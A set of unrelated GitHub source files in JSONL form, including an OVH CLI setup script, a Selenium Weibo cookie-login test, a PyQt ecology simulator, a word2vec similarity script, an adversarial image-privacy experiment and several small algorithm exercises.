+{"seq_id":"72250679593","text":"import os\nimport re\nimport codecs\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.install import install\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n\ndef read(*parts):\n return codecs.open(os.path.join(here, *parts), 'r').read()\n\n\ndef find_version(*file_paths):\n version_file = read(*file_paths)\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\n\ndef install_completion_script():\n import os\n has_bash = False\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, 'bash')\n if os.path.isfile(exe_file) and os.access(exe_file, os.X_OK):\n has_bash = True\n\n if not has_bash:\n if os.system('complete') != 0:\n print('\\033[93mWarning: you do not have \"complete\" command, '\n 'the completion feature won\\'t be installed.\\033[0m')\n else:\n print('\\033[93mWarning: \"bash\" not found, the completion feature won\\'t be installed.\\033[0m')\n return\n\n if not os.path.isdir('/etc'):\n print('\\033[93mWarning: you do not have an unix environment, I cannot install the completion script.'\n 'Please install it manually by copying ovhcli_complete.sh to the correct folder '\n 'so it is executed at startup.\\033[0m')\n return\n\n if not os.path.isdir('/etc/bash_completion.d'):\n print('\\033[93mWarning: you do not have a \"/etc/bash_completion.d\" folder, the completion script will not '\n 'be installed. If you want to activate it, source ovhcli_complete.sh.\\033[0m')\n return\n\n with open('/etc/bash_completion.d/ovhcli', 'w+') as f:\n f.write(read('ovhcli_complete.sh'))\n\n try:\n os.chmod('/etc/bash_completion.d/ovhcli', 0o644)\n except OSError:\n pass\n print('\\033[94mOVH CLI completion script installed at \"/etc/bash_completion.d/ovhcli\".\\n'\n 'You will need to reload your shell or source it to activate the script.\\033[0m')\n\n\nclass PostInstallCommand(install):\n def run(self):\n install_completion_script()\n install.run(self)\n\nsetup(\n name=\"ovh_api_cli\",\n version=find_version(\"ovh_api_cli\", \"__init__.py\"),\n description=\"A wrapper over OVH's API with killer autocomplete feature.\",\n long_description=read('README.rst'),\n classifiers=[\n \"Topic :: Utilities\",\n \"Environment :: Console\",\n \"Development Status :: 4 - Beta\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n ],\n keywords='ovh cli api apiv6',\n author='Cyril DEMINGEON',\n author_email='cyril.demingeon@corp.ovh.com',\n url='https://api.ovh.com/',\n license='MIT',\n packages=find_packages(),\n include_package_data=True,\n package_data={\n 'data': ['README.md', 'ovhcli_complete.sh', '*.py']\n },\n entry_points={\n \"console_scripts\": [\n \"ovhcli=ovh_api_cli:main\"\n ],\n },\n cmdclass={\n 'install': PostInstallCommand,\n }\n)\n","repo_name":"cyrbil/OVH-API-CLI","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32585147442","text":"import json\nimport pprint\nimport time\nimport yaml\n\nfrom selenium import webdriver\n\n\n\n\nclass Test():\n def setup_class(self):\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--start-maximized')\n self.driver = webdriver.Chrome(chrome_options=chrome_options)\n # self.driver.get(\"https://weibo.com/brawenfire/home\")\n self.driver.implicitly_wait(5)\n time.sleep(15)\n\n def teardown_class(self):\n print(\"访问结束\")\n self.driver.quit()\n #\n def test_getcookies(self):\n time.sleep(3)\n cookies = self.driver.get_cookies()\n # jsoncookies = json.dumps(cookies,indent=True,sort_keys=4) 不能用这个格式再存,直接用yaml,或者json.dumps然后 f.write(jsonCookies)\n pprint.pprint(cookies)\n with open (\"weibo.yaml\",\"w\") as f:\n yaml.dump(cookies,f)\n pprint.pprint(cookies)\n\n def test_login(self):\n self.driver.get(r\"https://weibo.com/\")\n time.sleep(4)\n with open(r\"weibo.yaml\",encoding=\"utf-8\") as f:\n cookies = yaml.safe_load(f)\n print(cookies)\n for c in cookies:\n self.driver.add_cookie(c)\n self.driver.refresh()\n time.sleep(5)\n print(\"登陆成功\")","repo_name":"Brawenlu/pytestproject","sub_path":"Pytest/test_loginwebbo.py","file_name":"test_loginwebbo.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2033765645","text":"PI = 3.14159\nlinha1 = input()\ndados1 = linha1.split()\n\na = dados1[0]\nb = dados1[1]\nc = dados1[2]\n\ntriangulo = (float(a) * float(c)) / 2\ncirculo = float(c) ** 2 * PI\ntrapezio = (float(a) + float(b)) * float(c) / 2\nquadrado = float(b) ** 2\nretangulo = float(a) * float(b)\n\nprint(\"TRIANGULO:\", format(triangulo, \".3f\"))\nprint(\"CIRCULO:\", format(circulo, \".3f\"))\nprint(\"TRAPEZIO:\", format(trapezio, \".3f\"))\nprint(\"QUADRADO:\", format(quadrado, \".3f\"))\nprint(\"RETANGULO:\", format(retangulo, \".3f\"))","repo_name":"viniielopes/uri","sub_path":"iniciante/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6602980726","text":"from PyQt5.Qt import QWidget, QColor, QPixmap, QIcon, QSize, QCheckBox\nfrom PyQt5.QtWidgets import QHBoxLayout, QVBoxLayout, QPushButton, QSplitter, \\\n QComboBox, QLabel, QSpinBox, QFileDialog\nfrom PaintBoard import PaintBoard\n\nclass MainWidget(QWidget):\n def __init__(self, Parent=None):\n super().__init__(Parent)\n self.__InitData() # 先初始化数据,再初始化界面\n self.__InitView()\n\n # 初始化成员变量\n def __InitData(self):\n self.__paintBoard = PaintBoard(self)\n\n # 初始化界面\n def __InitView(self):\n self.setFixedSize(640, 480)\n self.setWindowTitle(\"生态模拟仿真系统\")\n\n # 新建一个水平布局作为本窗体的主布局\n main_layout = QHBoxLayout(self)\n # 设置主布局内边距以及控件间距为10px\n main_layout.setSpacing(10)\n # 在主界面左侧放置动画显示界面\n main_layout.addWidget(self.__paintBoard)\n # 新建垂直子布局用于放置按键\n sub_layout = QVBoxLayout()\n # 设置此子布局和内部控件的间距为10px\n sub_layout.setContentsMargins(10, 10, 10, 10)\n\n # 添加文字和按钮\n # 设置小草数量\n self.__label_Grass = QLabel(self)\n self.__label_Grass.setText(\"小草数量\")\n self.__label_Grass.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Grass) # 文字\n\n self.__spinBox_Grass = QSpinBox(self)\n self.__spinBox_Grass.setMaximum(35) # 最大值为35\n self.__spinBox_Grass.setMinimum(2) # 最小值为2\n self.__spinBox_Grass.setValue(10) # 默认数值为10\n self.__spinBox_Grass.setSingleStep(2) # 最小变化值为2\n self.__spinBox_Grass.valueChanged.connect(self.on_GrassNumChange) # 关联spinBox值变化信号和函数on_GrassNumChange\n sub_layout.addWidget(self.__spinBox_Grass) # 下拉选择框\n\n # 设置大型植物数量\n self.__label_Macrophyte = QLabel(self)\n self.__label_Macrophyte.setText(\"大型植物数量\")\n self.__label_Macrophyte.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Macrophyte)\n\n self.__spinBox_Macrophyte = QSpinBox(self)\n self.__spinBox_Macrophyte.setMaximum(25)#最大值为25\n self.__spinBox_Macrophyte.setMinimum(5)#最小值为5\n self.__spinBox_Macrophyte.setValue(5) # 默认数值为5\n self.__spinBox_Macrophyte.setSingleStep(2) # 最小变化值为2\n self.__spinBox_Macrophyte.valueChanged.connect(self.on_MacrophyteNumChange)\n sub_layout.addWidget(self.__spinBox_Macrophyte)\n\n # 设置兔子数量\n self.__label_Rabbit = QLabel(self)\n self.__label_Rabbit.setText(\"兔子数量\")\n self.__label_Rabbit.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Rabbit)\n\n self.__spinBox_Rabbit = QSpinBox(self)\n self.__spinBox_Rabbit.setMaximum(15)#最大值为15\n self.__spinBox_Rabbit.setMinimum(0)#最小值为0\n self.__spinBox_Rabbit.setValue(1) # 默认数值为1\n self.__spinBox_Rabbit.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Rabbit.valueChanged.connect(self.on_RabbitNumChange)\n sub_layout.addWidget(self.__spinBox_Rabbit)\n\n # 设置蛇数量\n self.__label_Snake = QLabel(self)\n self.__label_Snake.setText(\"蛇数量\")\n self.__label_Snake.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Snake)\n\n self.__spinBox_Snake = QSpinBox(self)\n self.__spinBox_Snake.setMaximum(15)#最大值15\n self.__spinBox_Snake.setMinimum(0)#最小值0\n self.__spinBox_Snake.setValue(1) # 默认数值为1\n self.__spinBox_Snake.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Snake.valueChanged.connect(self.on_SnakeNumChange)\n sub_layout.addWidget(self.__spinBox_Snake)\n\n # 设置老虎数量\n self.__label_Tiger = QLabel(self)\n self.__label_Tiger.setText(\"老虎数量\")\n self.__label_Tiger.setFixedHeight(20)\n sub_layout.addWidget(self.__label_Tiger)\n\n self.__spinBox_Tiger = QSpinBox(self)\n self.__spinBox_Tiger.setMaximum(10)\n self.__spinBox_Tiger.setMinimum(0)\n self.__spinBox_Tiger.setValue(1) # 默认数值为1\n self.__spinBox_Tiger.setSingleStep(1) # 最小变化值为1\n self.__spinBox_Tiger.valueChanged.connect(self.on_TigerNumChange)\n sub_layout.addWidget(self.__spinBox_Tiger)\n\n # 确定按钮\n self.__btn_Sure = QPushButton(\"确定\")\n self.__btn_Sure.setParent(self) # 设置父对象为本界面\n self.__btn_Sure.clicked.connect(self.__paintBoard.Print)# 关联button点击事件和函数Print\n sub_layout.addWidget(self.__btn_Sure)\n\n # 清空按钮\n self.__btn_Clear = QPushButton(\"清空\")\n self.__btn_Clear.setParent(self) # 设置父对象为本界面\n self.__btn_Clear.clicked.connect(self.__paintBoard.Clear)\n sub_layout.addWidget(self.__btn_Clear)\n\n # 退出按钮\n self.__btn_Quit = QPushButton(\"退出\")\n self.__btn_Quit.setParent(self) # 设置父对象为本界面\n self.__btn_Quit.clicked.connect(self.Quit)\n sub_layout.addWidget(self.__btn_Quit)\n\n main_layout.addLayout(sub_layout) # 将子布��加入主布局\n\n # 获取设置后的生物数量\n def on_GrassNumChange(self):\n GrassNum = self.__spinBox_Grass.value()\n self.__paintBoard.GrassNumChange(GrassNum)\n\n def on_MacrophyteNumChange(self):\n MacrophyteNum = self.__spinBox_Macrophyte.value()\n self.__paintBoard.MacrophyteNumChange(MacrophyteNum)\n\n def on_RabbitNumChange(self):\n RabbitNum = self.__spinBox_Rabbit.value()\n self.__paintBoard.RabbitNumChange(RabbitNum)\n\n def on_SnakeNumChange(self):\n SnakeNum = self.__spinBox_Snake.value()\n self.__paintBoard.SnakeNumChange(SnakeNum)\n\n def on_TigerNumChange(self):\n TigerNum = self.__spinBox_Tiger.value()\n self.__paintBoard.TigerNumChange(TigerNum)\n\n # 退出\n def Quit(self):\n self.close()\n","repo_name":"zpp3668/Ecological-Simulation-System","sub_path":"test/ex-clock/MainWidget.py","file_name":"MainWidget.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"72361536233","text":"#coding=utf-8\n#城市P99 2017.4.17\ncities = {\n\t'beiJing':{\n\t\t'country':'China',\n\t\t'fact':'capital',\n\t\t},\n\t'newYork':{\n\t\t'country':'America',\n\t\t'fact':'economicalCity',\n\t\t},\n\t'oxford':{\n\t\t'country':'britain',\n\t\t'fact':'educationCity',\n\t\t}\n\t}\ncities['luoshan']={\n\t'country':'China',\n\t'fact':'myHometown',\n}\ndel cities['newYork']\nfor cityName,cityInfo in cities.items():\n\tprint('cityName:'+cityName.title())\n\tprint('country:'+cityInfo['country'])\n\tprint('fact:'+cityInfo['fact'].title()+'\\n')\n","repo_name":"jercas/PythonCrashCourse","sub_path":"LearningCode/6_11_cities.py","file_name":"6_11_cities.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13679752205","text":"from typing import Iterable, Union\nfrom .repr import PseudoBoolFunc\nfrom .utils import iter_assignments\nimport copy\n\nclass Table(PseudoBoolFunc):\n MUST_ALWAYS_BE_BOOLEAN = False\n\n def __init__(self, table: list[int], vars: list[str], print_mode=\"primes\"):\n super().__init__()\n self.__table = table\n self.__vars = vars\n self.__print_mode = print_mode\n assert 2**len(self.vars) == len(self.__table)\n\n def set_print_mode(self, mode):\n assert mode in [\"table\", \"primes\"]\n self.__print_mode = mode\n\n def __getitem__(self, key):\n return self.__table[self.assignment2idx(key)]\n\n def __hash__(self): \n return tuple(self.__table).__hash__() + tuple(self.vars).__hash__()\n\n def __copy__(self): \n return Table(self.__table.copy(), self.vars.copy())\n\n @property\n def is_boolean(self):\n return all(c in [0,1] for c in self.__table)\n\n @property\n def vars(self) -> Iterable[str]: \n return self.__vars\n\n def cofactor(self, ass: dict[str, bool]) -> \"Table\": \n new_vars = [x for x in self.vars if x not in ass]\n table = Table.zeros(new_vars)\n for u in iter_assignments(new_vars):\n table[u] = self[u | ass]\n return table\n\n def flip(self, S: Union[str, set[str]]) -> \"Table\": \n if isinstance(S,str): S = {S}\n table = copy.copy(self)\n for ass in iter_assignments(self.vars):\n table[ass] = self[ass | { x: not ass[x] for x in S }]\n return table\n \n @classmethod\n @property\n def false(cls) -> \"Table\": \n return Table([False], [])\n\n @classmethod\n @property\n def true(cls) -> \"Table\": \n return Table([True], [])\n\n @classmethod\n def _apply(cls, op: str, *children) -> \"Table\":\n assert all( isinstance(c,PseudoBoolFunc) or isinstance(c,float) or isinstance(c,int) for c in children ) \n all_vars = list( set().union( *(set(c.vars) for c in children if isinstance(c, PseudoBoolFunc) )) ) \n new_table = Table.zeros(all_vars)\n children_are_boolean = all(c.is_boolean if isinstance(c,PseudoBoolFunc) else c in [0,1] for c in children)\n for ass in iter_assignments(all_vars):\n vals = [ c[ass] if isinstance(c, PseudoBoolFunc) else c for c in children ]\n val = None\n if op == \"+\": val = vals[0]+vals[1]\n elif op == \"-\": val = -vals[0]\n elif op == \"*\": val = vals[0]*vals[1]\n elif op == \"**\": val = vals[0]**vals[1]\n elif op == \"abs\": val = abs(vals[0])\n elif children_are_boolean:\n if op == \"~\": val = not vals[0]\n elif op == \"&\": val = vals[0] and vals[1]\n elif op == \"|\": val = vals[0] or vals[1]\n elif op == \"^\": val = vals[0] != vals[1]\n elif op == \"->\": val = not vals[0] or vals[1]\n elif op == \"<-\": val = vals[0] or not vals[1]\n elif op == \"<->\": val = vals[0] == vals[1]\n else: raise Exception(f\"operation {op} not applicable if all operands are Boolean functions.\")\n else: raise Exception(f\"operation {op} not applicable.\")\n new_table[ass] = val\n return new_table\n\n @classmethod\n def var(cls, x: str) -> \"Table\":\n return Table([False, True], [x])\n\n def expectation(self) -> float:\n return sum(self.__table) / 2**len(self.vars)\n\n # --- END ABSTRACT METHODS ---\n\n def replace(self, d: dict[str, str]):\n cpy_vars = self.vars.copy()\n for idx in range(len(self.vars)):\n if self.vars[idx] in d:\n cpy_vars[idx] = d[self.vars[idx]]\n assert len(self.vars) == len(set(cpy_vars)), \"renaming must be a bijection!\"\n return Table(self.__table, cpy_vars)\n\n def __setitem__(self, key, val):\n if isinstance(key, dict): \n key = self.assignment2idx(key)\n self.__table[key] = val\n\n # def resort(self, new_vars: Iterable[str]) -> \"PseudoBoolFunc\":\n # assert set(new_vars) == set(self.vars)\n # cpy = copy.copy(self)\n # for ass in iter_assignments(new_vars):\n # cpy[ass] = self[ass]\n # return cpy\n\n def assignment2idx(self, assignment: dict[str, bool]) -> int:\n table_index = 0\n for idx in range(len(self.vars)):\n v = self.vars[len(self.vars)-idx-1]\n if assignment[v]: table_index += 2**idx\n return table_index\n\n def __repr__(self):\n if self.__print_mode == \"table\" or not self.is_boolean:\n ret = \" \".join(self.vars) + \" f\" + \"\\n\" + \"-\"*(len(self.vars)*2+1) \n for ass in iter_assignments(self.vars):\n ret += \"\\n\" + \" \".join({True: \"1\", False: \"0\"}[ass[x]] for x in self.vars)\n ret += f\" {float(self[ass]):.5}\"\n ret += \"\\n\"\n elif self.__print_mode == \"primes\":\n if self.expectation() == 0: return \"0\"\n elif self.expectation() == 1: return \"1\"\n primes = self.prime_implicants()\n ret = \" | \".join(\"\".join(k if v else k+\"'\" for k,v in p.items()) for p in primes)\n else:\n raise Exception(f\"print_mode must either be 'primes' or 'table' but is {self.__print_mode}.\")\n return ret\n\n @classmethod\n def zeros(cls, vars: list[str]) -> \"Table\":\n return Table([0 for _ in range(2**len(vars))], vars)\n","repo_name":"graps1/impmeas","sub_path":"impmeas/representation/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28502876068","text":"# LAZY IMPORT\nimport os\nimport sys\ncur_dir = os.path.dirname(__file__)\nmaster_dir = os.path.join(\"..\", cur_dir)\nsys.path.append(master_dir)\n##############################\n\n\nfrom pixel_privacy.models.biqa_model import BIQAModel\nfrom pixel_privacy.attacks.simple_white_box import SimpleWhiteBox\n\n\n\nif __name__ == \"__main__\":\n weight_path = \"../../2020-Pixel-Privacy-Task-master/BIQA_model/KonCept512.pth\"\n image_path = \"../../2020-Pixel-Privacy-Task-master/pp2020_test/Places365_val_00015483.png\"\n\n model = BIQAModel(weight_path, pretrained=None)\n print(\"Inited model\")\n attack = SimpleWhiteBox()\n\n attack.attack_binary(\n model,\n image_path,\n device=\"cuda\",\n lr=1e-2,\n )\n","repo_name":"cin-xing/pixel_privacy_2020","sub_path":"scripts/test_attack.py","file_name":"test_attack.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73248813354","text":"def merge(a, b):\n n, m = len(a), len(b)\n i, j = 0, 0\n c = []\n while (i < n or j < m):\n if (j == m or (i < n and a[i] < b[j])):\n c.append(a[i])\n i += 1\n else:\n c.append(b[j])\n j += 1\n return c\n\ndef sort(a):\n n = len(a)\n if (n <= 1):\n return a\n al = a[:(n//2)]\n ar = a[(n//2):]\n al, ar = sort(al), sort(ar)\n return merge(al, ar)\n\na = []\nn = int(input())\nel = list(map(int, input().split()))\nfor i in range(n):\n a.append(el[i])\n\na = sort(a)\n\nfor i in a:\n print(i, end = ' ')","repo_name":"priamoryki/ITMO","sub_path":"semester-1/algo/Lab-1/TaskA.py","file_name":"TaskA.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4748355028","text":"#-*- coding:utf-8 -*-\n# sklearn을 사용한 코사인 유사도 측정\n\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom gensim.models import Word2Vec\nfrom konlpy.tag import Mecab\nimport numpy as np\nimport re\n\ndata_sentence =['구성 및 특성\\r\\n시스템폼은 기본적으로 2개 이상의 브라켓 유니트로 이루어져 있다. 상부 작업대(0레벨) 중간작업대(-1레벨), 하부작업대(-2레벨), 거푸집 및 콘��리트 타설용 발판(+1레벨)로 구성되어 있다.\\r\\n상부작업대(0레벨)은 거푸집 아래에 있는 작업발판이고 클라이밍 시스템의 메인 크로스빔이 있는 0레벨 발판이며 거푸집 해체·설치가 이루어진다.\\r\\n중간작업대(-1레벨)는 거푸집의 인양작업 발판이고 하부작업대(-2레벨)는 거푸집 인양 후 슈(Shoe) 제거작업, 마감작업 등을 위한 발판이고 +1레벨 발판을 통상적으로 콘크리트 타설용으로 거푸집에 설치되어 있다.\\r\\nRCS 레일은 보통 2개 이상의 클라이밍 레일로 이루어져 있고 각각의 레일은 클라이밍 레일 커플링으로 연결되어 -1레벨의 헤비 듀티 스핀들을 이용해서 거푸집 인양을 위한 각도를 조절할 수 있다.\\r\\n모든 브라켓유니트가 연결된 클라이밍 레일은 M20볼트에 의해 클라이밍 슈 걸림쇠에 지지되며 클라이밍 슈는 월슈 또는 슬라브슈에 연결되어 하중 을 전달하고 월슈 및 슬라브슈는 M24볼트나 M30볼트로 콘크리트 타설시 미리 매립되어 있는 클라이밍 콘과 타이로드, 앵커플레이트에 연결되어 하중을 구조체로 전달한다.\\r\\n시스템폼의 모든 구성 부재 및 부속품은 제작사의 정품을 사용하고 안전성을 확인 하여야 한다. ']\n\ncorpuses = []\nfor sentence in data_sentence:\n corpuses.append(sentence)\nprint(corpuses, len(corpuses))\n\n\n# 1. input 문장의 token화\n# 한 줄의 문장이 들어가는 것을 가정\ndef meacb_tokenizer(corpuses):\n corpuses =[ re.sub(r'[^ ㄱ-ㅣ가-힣A-Za-z]', '', corpus) for corpus in corpuses] # 특수기호, 한자 제거\n mecab = Mecab(dicpath=r\"C:/mecab/mecab-ko-dic\")\n # answer = [mecab.nouns(corpuses)]\n answer = []\n for corpus in corpuses:\n temp =[]\n for token in mecab.nouns(corpus):\n temp.append(token)\n answer.append(temp)\n return answer\n\n\n# 2. input의 단어벡터 생성\n# vector_size, window, sg만 설정. 나머지는 defult값 사용\ninput_word2vec_model = Word2Vec.load('Models/word2vec_model/final_data_mecab_ing_word2vec.model')\n\n# 3. input의 문장벡터 생성\ndef makeFeatureVec(words, model, num_features):\n # 속도를 위해 0으로 채운 배열로 초기화 한다.\n featureVec = np.zeros((num_features,),dtype=\"float32\")\n\n nwords = 0.\n # Index2word는 모델의 사전에 있는 단어명을 담은 리스트이다.\n corpus_index2word = model.wv.index_to_key\n # 루프를 돌며 모델 사전에 포함이 되는 단어라면 피처에 추가한다.\n for word in words:\n #print(word)\n if word in corpus_index2word:\n nwords = nwords + 1.\n #print(np.add(featureVec,model.wv[word]))\n featureVec = np.add(featureVec,model.wv[word])\n # 결과를 단어수로 나누어 평균을 구한다.\n print(featureVec.shape, nwords)\n\n featureVec = np.divide(featureVec,nwords)\n \n return featureVec\n\n\nsentence_vector = np.empty(shape=(300,1), dtype='float32')\nmodel = Word2Vec.load('Models/word2vec_model/final_data_mecab_ing_word2vec.model')\nfor sentence in meacb_tokenizer(corpuses):\n \n sentence_vector = np.add(sentence_vector,makeFeatureVec(sentence, model, 300))\nsentence_vector = np.transpose(sentence_vector)\n# 저장되어 있는 sentence_vector 불러오기\nvector_case600 = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/case600_sentence_vector.npy')\nvector_case10000 = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/case10000_sentence_vector.npy')\nvector_GJ = np.load('C:/Users/김민주/project/Safety_Helmet/Models/sentence_vector/GJ_sentence_vector.npy')\n\nprint(sentence_vector.shape)\nprint(vector_case600.shape)\nprint(vector_case10000.dtype)\nprint(vector_GJ.dtype)\n\n# 각각의 sentence_vector와 코사인 유사도 실행\ncosine_sim_600 = cosine_similarity(sentence_vector, vector_case600)\ncosine_sim_10000 = cosine_similarity(sentence_vector, vector_case10000)\ncosine_sim_GJ = cosine_similarity(sentence_vector, vector_GJ)\n\n\n# 유사도에 따라 문장들 정렬?\n# sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n# 가장 유사한 --개의 문장 받아오기\n# sim_scores = sim_scores[1:11]\n\n\n# vector_to_id?\n","repo_name":"ai-castlemoney/Safety_Helmet","sub_path":"10. Models/calculate_cosine_similarity.py","file_name":"calculate_cosine_similarity.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72220736873","text":"import pandas as pd\nimport numpy as np\nimport random as rd\nimport sklearn\nimport xlrd\n\ndf = pd.read_excel('data.xlsx')\nnp.set_printoptions(suppress=True)\n\ndf = df.to_numpy()\ntasks = df.shape[0]\nnumber_of_machines = df.shape[1]\ndf_start = df.copy()\n\n\ndef calculate(arr):\n first_row = arr[0, 0:number_of_machines]\n w = 0\n row_sum = np.array([])\n for j in first_row:\n if w == 0:\n row_sum = np.append(row_sum, j)\n elif w == 1:\n row_sum = np.append(row_sum, j)\n elif w < number_of_machines + 1:\n row_sum = np.append(row_sum, j + row_sum[w - 1])\n w = w + 1\n result = row_sum\n\n if arr.ndim > 1:\n row_before = result\n number_of_tasks = arr.shape[0]\n df_copy = arr[1:number_of_tasks, 0:number_of_machines]\n n = 0\n for i in df_copy:\n row_add = np.array([])\n for k in i:\n if n == 0:\n row_add = np.append(row_add, k)\n elif n == 1:\n row_add = np.append(row_add, k + row_before[1])\n elif n < number_of_machines + 1:\n add = max(row_add[n - 1], row_before[n]) + k\n row_add = np.append(row_add, add)\n else:\n pass\n n = n + 1\n if n == number_of_machines:\n n = 0\n row_before = row_add.copy()\n result = np.vstack([result, row_add])\n return result\n\n\ndef generate_pop(population_size):\n list_of_pop = np.array([])\n for i in range(population_size):\n osobnik = np.random.choice(np.arange(0, tasks), tasks, replace=False)\n if i == 0:\n list_of_pop = np.append(list_of_pop, osobnik)\n else:\n list_of_pop = np.vstack([list_of_pop, osobnik])\n return list_of_pop\n\n\ndef osobnik_cal(data, indeks_order):\n indeks_order = indeks_order.astype(np.int64)\n data = data.take(indeks_order, axis=0)\n res = calculate(data)[-1][-1]\n return res\n\n\ndef tournament(data, population):\n best_pop = np.array([])\n\n for i in range(len(population)):\n random_osob = np.random.choice(np.arange(0, len(population)), 2, replace=False)\n osobnik1 = population[random_osob[0]]\n score1 = osobnik_cal(data, osobnik1)\n osobnik2 = population[random_osob[1]]\n score2 = osobnik_cal(data, osobnik2)\n if score1 < score2:\n if len(best_pop) == 0:\n best_pop = osobnik1\n else:\n best_pop = np.vstack([best_pop, osobnik1])\n else:\n if len(best_pop) == 0:\n best_pop = osobnik2\n else:\n best_pop = np.vstack([best_pop, osobnik2])\n\n return best_pop\n\n\ndef rank_roulette(data, population):\n scores = np.array([])\n for i in range(len(population)):\n data_start = data\n offspring_score = osobnik_cal(data_start, population[i])\n scores = np.append(scores, offspring_score)\n\n scores_sort = np.argsort(scores)\n population = population[scores_sort]\n\n marks = np.arange(1, len(population) + 1)\n sum_marks = np.sum(marks)\n prob = np.sort(marks / sum_marks)[::-1]\n index = np.arange(len(population))\n\n roulette = np.random.choice(index, size=len(population), replace=True, p=prob)\n selected_population = population[roulette]\n\n return selected_population\n\n\ndef crossover(parents):\n offsprings = np.array([])\n for i in range(int(len(parents) / 2)):\n parent1 = parents[i]\n parent2 = parents[len(parents) - 1 - i]\n len1 = int(parent1.shape[0] / 2)\n offspring1 = parent1[0:len1]\n for i in parent2:\n if i in offspring1:\n pass\n else:\n offspring1 = np.append(offspring1, i)\n if len(offsprings) == 0:\n offsprings = offspring1\n else:\n offsprings = np.vstack([offsprings, offspring1])\n\n offspring2 = parent2[0:len1]\n for i in parent1:\n if i in offspring2:\n pass\n else:\n offspring2 = np.append(offspring2, i)\n\n offsprings = np.vstack([offsprings, offspring2])\n\n return offsprings\n\n\ndef order_crossover(parents):\n number1 = np.random.randint(len(parents))\n number2 = np.random.randint(len(parents))\n offsprings = np.array([])\n for i in range(int(len(parents)/2)):\n if number1 <= number2:\n offspring1 = parents[i, number1:number2]\n offspring2 = parents[len(parents) - i - 1, number1:number2]\n start_len = len(parents) - number2\n start_len2 = len(parents) - number2\n add_order_offspring1 = parents[len(parents) - i - 1, number2:]\n add_order_offspring1 = np.append(add_order_offspring1, parents[len(parents) - i - 1, 0:number2])\n add_order_offspring2 = parents[i, number2:]\n add_order_offspring2 = np.append(add_order_offspring2, parents[i, 0:number2])\n else:\n offspring1 = parents[i, number2:number1]\n offspring2 = parents[len(parents) - i - 1, number2:number1]\n start_len = len(parents) - number1\n start_len2 = len(parents) - number1\n add_order_offspring1 = parents[len(parents) - i - 1, number1:]\n add_order_offspring1 = np.append(add_order_offspring1, parents[len(parents) - i - 1, 0:number1])\n add_order_offspring2 = parents[i, number1:]\n add_order_offspring2 = np.append(add_order_offspring2, parents[i, 0:number1])\n\n for j in add_order_offspring1:\n if j not in offspring1:\n if start_len > 0:\n offspring1 = np.append(offspring1, j)\n start_len = start_len - 1\n else:\n offspring1 = np.insert(offspring1, 0, j)\n if len(offsprings) == 0:\n offsprings = offspring1\n else:\n offsprings = np.vstack([offsprings, offspring1])\n\n for j in add_order_offspring2:\n if j not in offspring2:\n if start_len2 > 0:\n offspring2 = np.append(offspring2, j)\n start_len2 = start_len2 - 1\n else:\n offspring2 = np.insert(offspring2, 0, j)\n offsprings = np.vstack([offsprings, offspring2])\n\n return offsprings\n\n\ndef mutate(offspring_array):\n for i in range(len(offspring_array)):\n if rd.random() >= 0.95:\n rand1, rand2 = np.random.choice(np.arange(0, tasks), 2, replace=False)\n offspring_array[i, [rand1, rand2]] = offspring_array[i, [rand2, rand1]]\n\n return offspring_array\n\n\ndef save_best(population_array, data):\n data_copy = data.copy()\n first = True\n for i in population_array:\n data = data_copy\n score = osobnik_cal(data, i)\n if first:\n best_score = score\n best_order = i\n first = False\n elif (score < best_score):\n best_score = score\n best_order = i\n\n return best_order, score\n\n\npop = generate_pop(100)\nfor i in range(100):\n t = rank_roulette(df_start, pop) # selection: \"tournament\" or \"rank_roulette\"\n w = crossover(t) # crossover: \"order_crossover\" or \"crossover\"\n m = mutate(w)\n s = save_best(m, df_start)\n if i == 0:\n best_s = s\n elif i > 0:\n if s[1] < best_s[1]:\n best_s = s\n\n pop = m\n 